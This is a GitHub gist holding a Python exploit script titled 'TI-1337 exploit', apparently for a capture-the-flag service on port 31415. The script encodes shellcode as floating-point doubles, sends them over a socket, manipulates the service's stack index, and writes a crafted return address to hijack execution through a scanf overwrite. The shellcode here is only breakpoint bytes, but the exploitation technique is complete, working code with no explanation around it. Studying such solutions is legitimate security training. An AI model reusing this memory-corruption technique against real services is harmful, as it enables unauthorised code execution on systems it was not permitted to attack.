Created
January 20, 2014 03:58
-
-
Save withzombies/8514659 to your computer and use it in GitHub Desktop.
TI-1337 exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import os | |
| import sys | |
| import socket | |
| import struct | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| if len(sys.argv) > 1: | |
| s.connect((sys.argv[1], 31415)) | |
| else: | |
| s.connect(('localhost', 31415)) | |
| print "Press Enter to continue" | |
| raw_input() | |
| sc = [ 0xcc, ] * 200 | |
| sc += [0x90, ] * (8 - (len(sc) % 8)) # pad the sc to multiples of 8 bytes | |
| packed_sc = ''.join(map(chr, sc)) | |
| print repr(sc) | |
| cursor = packed_sc | |
| # Send the shellcode encoded as a double | |
| for i in xrange(0, len(sc) / 8): | |
| (d, ) = struct.unpack("d", cursor[0:8]) | |
| print ">>", str(d) | |
| s.send(str(d) + '\n') | |
| cursor = cursor[8:] | |
| # reset the stack index | |
| print ">> c" | |
| s.send("c\n") | |
| print "<<", s.recv(1024) | |
| for _ in xrange(19): | |
| print ">> b" | |
| s.send("b\n") | |
| print "<<", s.recv(1024) | |
| (rip, ) = struct.unpack("d", struct.pack("L", 0x603155)) | |
| print ">> ", str(rip) | |
| s.send(str(rip) + "\n") | |
| s.send("x\n") # this should trigger the scanf overwrite | |
| print "Press enter to end" | |
| raw_input() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment